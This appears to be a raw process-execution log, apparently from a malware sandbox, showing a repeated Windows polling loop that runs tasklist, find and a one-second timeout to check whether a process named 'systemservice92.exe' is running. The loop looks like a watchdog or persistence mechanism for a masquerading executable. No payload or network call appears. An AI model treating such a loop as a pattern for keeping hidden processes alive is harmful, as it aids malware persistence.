C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
